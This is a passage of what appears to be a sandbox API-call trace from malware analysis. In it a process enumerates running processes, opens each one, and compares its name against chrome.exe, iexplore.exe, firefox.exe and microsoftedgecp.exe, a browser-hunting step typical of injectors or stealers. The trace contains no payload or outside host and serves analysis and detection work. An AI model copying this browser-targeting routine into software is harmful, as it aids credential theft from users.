	[0242.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.982] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.983] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.983] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.983] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.984] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x8adc
	[0242.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.985] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.985] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.986] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.987] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.988] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.989] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x8ae0
	[0242.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.989] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.989] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.990] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.990] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.991] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.992] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x8ae4
	[0242.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.992] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.992] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.993] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.993] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.994] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0242.995] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x8ae8
	[0242.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.995] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0242.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.995] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.996] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0242.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.996] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.996] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.997] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x8aec
	[0242.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.998] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.998] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.999] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.999] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.999] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0243.001] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x8af0
	[0243.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.001] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.001] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.003] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.003] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.003] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0243.005] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x8af4
	[0243.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.005] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0243.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.005] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.006] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0243.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.006] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.006] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.007] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x8af8
	[0243.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.008] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.009] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.009] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.010] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.010] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0243.011] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x8afc
	[0243.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.011] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0243.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.012] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.012] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0243.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.013] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.013] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0243.014] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x8b00
	[0243.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.014] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0243.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.015] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.015] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0243.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.016] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.016] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0243.017] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x8b04
	[0243.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.018] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0243.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.018] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.019] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0243.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.019] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.019] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0243.020] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x8b08
	[0243.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.021] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0243.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.021] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.022] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0243.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.022] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.022] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0243.023] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0243.024] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0243.025] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x8b0c
	[0243.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.025] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0243.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.026] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.026] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0243.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.027] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.028] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0243.029] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x8b10
	[0243.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.029] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0243.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.030] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.030] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0243.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.031] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.031] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0243.032] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x8b14
	[0243.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.032] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0243.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.032] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.034] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0243.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.035] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.035] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0243.036] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x8b18
	[0243.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.036] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0243.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.036] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.037] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0243.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.037] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.037] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0243.039] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x8b1c
	[0243.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.039] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0243.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.040] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.040] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0243.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.041] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.042] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0243.043] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x8b20
	[0243.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.043] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0243.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.043] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.043] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0243.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.044] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.044] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0243.045] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x8b24
	[0243.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.045] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0243.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.045] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.046] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0243.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.046] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.046] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0243.047] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x8b28
	[0243.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.047] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0243.048] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.048] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.048] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.049] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0243.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.050] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.050] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0243.051] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x8b2c
	[0243.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.051] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0243.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.051] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.052] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0243.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.052] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.052] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0243.053] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x8b30
	[0243.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.053] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0243.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.053] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.054] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0243.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.054] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.054] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0243.055] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x8b34
	[0243.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.055] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0243.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.055] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.056] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0243.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.056] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.057] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0243.057] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x8b38
	[0243.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.057] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0243.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.058] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.059] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
